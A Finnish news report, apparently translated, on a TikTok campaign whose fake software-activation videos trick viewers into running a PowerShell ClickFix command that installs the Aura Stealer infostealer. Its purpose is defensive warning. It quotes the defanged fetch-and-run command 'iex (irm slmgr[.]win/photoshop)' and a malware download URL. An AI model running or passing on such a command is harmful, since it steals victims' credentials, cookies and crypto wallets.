Kyberrikolliset levittävät tietoa varastavia haittaohjelmia TikTok-kampanjan kautta käyttämällä videoita, jotka virheellisesti väittävät olevansa suosittujen ohjelmistojen ilmaisia aktivointioppaita. Meneillään oleva operaatio, joka tunnistettiin 19. lokakuuta 2025, käyttää sosiaalisen manipuloinnin menetelmää huijatakseen käyttäjiä saastuttamaan omat tietokoneensa. ISC:n käsittelijä Xavier Mertens raportoi kampanjasta ja huomautti sen yhtäläisyyksiä Trend Micron toukokuussa havaitsemaan toimintaan. TikTok-videoiden tarkoituksena on tarjota ohjeita laillisten ohjelmistojen, kuten Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro ja Discord Nitro, aktivoimiseen. Kampanja mainostaa myös valmistettuja palveluita, kuten ”Netflix Premium” ja ”Spotify Premium”, houkutellakseen laajempaa yleisöä. Hyökkäystekniikka tunnetaan ClickFix-hyökkäyksenä, joka sisältää hyödyllisiltä vaikuttavien ohjeiden tarjoamisen, jotka huijaavat käyttäjiä suorittamaan haitallisia komentoja. Videoissa näkyy lyhyt, yksirivinen PowerShell-komento ja opastetaan katsojia suorittamaan se järjestelmänvalvojan oikeuksin. Esitetty esimerkkikomento on iex (irm slmgr[.]win/photoshop). URL-osoitteessa oleva ohjelman nimi, kuten ”Photoshop”, muutetaan vastaamaan videossa esiintyvää ohjelmistoa. Kun käyttäjä suorittaa tämän komennon, PowerShell muodostaa yhteyden etäsivustoon slmgr[.]win. Tämä toiminto hakee ja suorittaa toisen PowerShell-komentosarjan, joka lataa sitten kaksi suoritettavaa tiedostoa Cloudflare-sivuilta. Ensimmäinen tiedosto, ladattu osoitteesta https://file-epq[.]pages[.]dev/updater.exeon muunnos Aura Stealer -haittaohjelmasta. Aura Stealer on suunniteltu keräämään tallennetut tunnistetiedot verkkoselaimista, todennusevästeistä, kryptovaluuttalompakoista ja kirjautumistiedot muista sovelluksista. Nämä varastetut tiedot ladataan sitten hyökkääjille, mikä antaa heille pääsyn uhrin tileille. Toinen hyötykuorma, nimeltään source.exeon myös ladattu. Tätä suoritettavaa tiedostoa käytetään itse kääntämään koodia .NET-kehyksen sisäänrakennetun Visual C# -kääntäjän (csc.exe) avulla. Käännetty koodi syötetään myöhemmin ja käynnistetään suoraan muistiin. Tämän toisen hyötykuorman erityistä tarkoitusta ei ole vielä määritetty. Käyttäjien, jotka ovat noudattaneet näiden videoiden ohjeita, tulee katsoa, että heidän kaikki kirjautumistietonsa ovat vaarantuneet, ja heitä kehotetaan välittömästi nollaamaan kaikkien käyttämiensä verkkosivustojen ja verkkopalvelujen salasanat. ClickFix-hyökkäykset ovat yleistyneet huomattavasti viimeisen vuoden aikana. Niitä käytetään erilaisten haittaohjelmien levittämiseen kiristysohjelmiin ja kryptovaluuttavarkauksiin liittyvissä kampanjoissa. Yleisenä tietoturvakäytäntönä käyttäjien ei tulisi koskaan kopioida tekstiä verkkosivustolta ja suorittaa sitä käyttöjärjestelmän valintaikkunassa, mukaan lukien File Explorerin osoitepalkki, komentokehote, PowerShell, macOS-pääte tai Linux-kuoret.
Source: TikTok-videot levittävät Aura Stealeriä väärennettyjen ohjelmistooppaiden kautta
